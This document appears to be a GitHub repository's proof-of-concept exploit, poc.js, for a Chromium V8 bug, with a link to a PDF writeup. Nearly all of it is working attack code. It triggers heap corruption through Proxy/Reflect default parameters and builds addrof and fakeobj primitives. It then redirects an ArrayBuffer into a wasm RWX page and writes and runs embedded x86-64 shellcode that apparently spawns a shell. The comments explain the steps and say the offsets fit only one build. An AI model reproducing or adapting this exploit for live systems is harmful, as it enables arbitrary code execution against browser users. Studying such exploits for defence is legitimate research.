// Repository listing: chromium-v8-exploit.pdf, poc.js
// /chromium-v8-exploit.pdf (writeup): https://raw.githubusercontent.com/cosdong7/chromium-v8-exploit/HEAD/chromium-v8-exploit.pdf
// /poc.js:
//
// Proof-of-concept for the V8 bug described in the accompanying writeup.
// Every hard-coded index and offset below (run[18], proxy[26], proxy[34],
// 0x108, 0x20, 0x10) is tied to one specific V8 build and heap layout; on
// any other build the script will most likely crash or report a bogus
// result rather than "succeed". Nothing in the script validates its
// assumptions before acting on them.
//
// The script targets the d8 shell: it uses d8's `print` (not defined in Node
// or browsers) alongside `console.log`, and it relies on sloppy mode —
// `callFn`, `v4`, `v5` and `doubleMap` are assigned without a declaration
// and would throw a ReferenceError under 'use strict'.

// Runs `code` and logs (rather than propagates) anything it throws, so the
// script continues past the two triggering calls below even when they fail.
// Assigned without a declaration -> implicit global.
callFn = function(code) {
  try {
    code();
  } catch (e) {
    console.log(e);
  }
}

// Module-level `proxy`. run() declares a different, local `proxy` that
// shadows this one; test() reads this outer binding.
let proxy = new Proxy({}, {});

// Bug trigger. `prop` names both the Proxy trap that is installed on
// `handler` and the Reflect method invoked at the end. The nested
// default-parameter expressions are not used for their values (the handler
// simply returns 1); the author's inline comments indicate the assignments
// inside the innermost function are meant to corrupt `run` and the outer
// `proxy`. Note that the function expression bound to `v2` is never called
// here — the arrow it is the default of is invoked once and returns 1 — and
// `asdf` is declared nowhere in this file, so its branch would throw a
// ReferenceError if it were ever evaluated. See the writeup for why this
// exact shape matters; do not reformat it expecting behaviour to survive.
function run(prop, ...args) {
  let handler = {};
  const proxy = new Proxy(function() {}, handler);
  handler[prop] = (({
    v1 = ((v2 = (function() {
      var v3 = 0;
      var callFn = 0;
      if (asdf) {
        return;
      } else {
        return;
      }
      (function() {
        v3();
      });
      (function() {
        callFn = "\u0041".repeat(1024 * 32); // mutate "run"
        v3 = [1.1, 2.2, 3.3]; // now "proxy" becomes a packed array.
        v4 = [{}].slice();
        v5 = [4.4];
      })
    })) => (1))()
  }, ...args) => (1));
  // `Reflect.construct` exists; `Reflect.prop1` does not, so the second call
  // below throws a TypeError that callFn logs and swallows.
  Reflect[prop](proxy, ...args);
}

callFn((() => (run("construct", []))));
callFn((() => (run("prop1"))));


// Exploit body. Every step depends on the state left behind by the two
// run() calls above and on build-specific constants; there is no check
// that the corruption actually occurred before the later steps use it
// (the "exploit fail" branch prints and then carries on regardless).
function test() {

  // One shared 8-byte buffer with a float64 and a uint32 view over it,
  // used to reinterpret doubles as pairs of 32-bit words and back.
  let convert = new ArrayBuffer(0x8);
  let f64 = new Float64Array(convert);
  let u32 = new Uint32Array(convert);


  // Double -> [lo, hi] words. Returns the shared `u32` view, not a copy, so
  // any later d2u/u2d call overwrites what a previous caller still holds.
  function d2u(v) {
    f64[0] = v;
    return u32;
  }

  // [lo, hi] words -> double.
  function u2d(lo, hi) {
    u32[0] = lo;
    u32[1] = hi;
    return f64[0];
  }

  // Hex string of a double's raw bits, for display only: the two halves are
  // recombined in a Number, so values above 2^53 lose low-order precision.
  function hex(d) {
    let val = d2u(d);
    return ("0x" + (val[1] * 0x100000000 + val[0]).toString(16));
  }


  // Platform-specific payload words; copied into `ab` near the end.
  let shellcode = [0x6a6848b8, 0x2f62696e, 0x2f2f2f73, 0x504889e7, 0x68726901, 0x1813424, 0x1010101, 0x31f656be, 0x1010101, 0x81f60901, 0x1014801, 0xe6564889, 0xe631d2b8, 0x01010101, 0x353a0101, 0x01900f05];
  // Minimal wasm module (one function, one memory) instantiated with an
  // empty import object; its export `_Z3addii` becomes `f`.
  let wasm_code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 7, 1, 96, 2, 127, 127, 1, 127, 3, 2, 1, 0, 4, 4, 1, 112, 0, 0, 5, 3, 1, 0, 1, 7, 21, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 8, 95, 90, 51, 97, 100, 100, 105, 105, 0, 0, 10, 9, 1, 7, 0, 32, 1, 32, 0, 106, 11]);
  let wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), {});
  let f = wasm_mod.exports._Z3addii;

  // Sanity check that the corruption took effect: a write through `run` is
  // expected to show up as `proxy.length`. Loose `==` where `===` would do;
  // note the failure branch only prints and does not abort.
  run[18] = 0x41414141;
  if(proxy.length == 0x41414141){
    print("exploit success!\n");
  }
  else{
    print("exploit fail TT\n");
  }

  // Relies on `v4` (an implicit global created inside run) and on index 26
  // of the corrupted `proxy`; both are build-specific.
  let addrof = function(obj) {
    v4[0] = obj;
    var leak = proxy[26];
    return leak;
  }

  // Inverse of addrof over the same `proxy[26]` / `v4[0]` pair.
  let fakeobj = function(addr) {
    proxy[26] = addr;
    var obj = v4[0];
    return obj;
  }

  let ab = new ArrayBuffer(0x100);
  let abAddr = addrof(ab);
  print("array buffer : " + hex(abAddr));


  // 0x108 is a build-specific offset (see writeup).
  let wasmObj = addrof(f) - u2d(0x108, 0);

  // Implicit global (no declaration); index 34 is build-specific.
  doubleMap = proxy[34];

  // `.slice()` yields a fresh array rather than the literal itself.
  var fake = [
    doubleMap, 0,
    wasmObj, u2d(0, 0x8)
  ].slice();
  // 0x20 is a build-specific offset (see writeup).
  var fakeAddr = addrof(fake) - u2d(0x20, 0);
  print("fake_addr : " + hex(fakeAddr));
  var target = fakeobj(fakeAddr);

  let rwx = target[0];
  print("rwx : " + hex(rwx));
  // 0x10 is a build-specific offset (see writeup).
  fake[2] = abAddr + u2d(0x10, 0);
  target[0] = rwx;

  // Copy the payload words into `ab` through a DataView, then call `f`.
  let dv = new DataView(ab);
  for (var i = 0; i < shellcode.length; i++) {
    dv.setUint32(i * 4, shellcode[i]);
  }
  f();

}

test();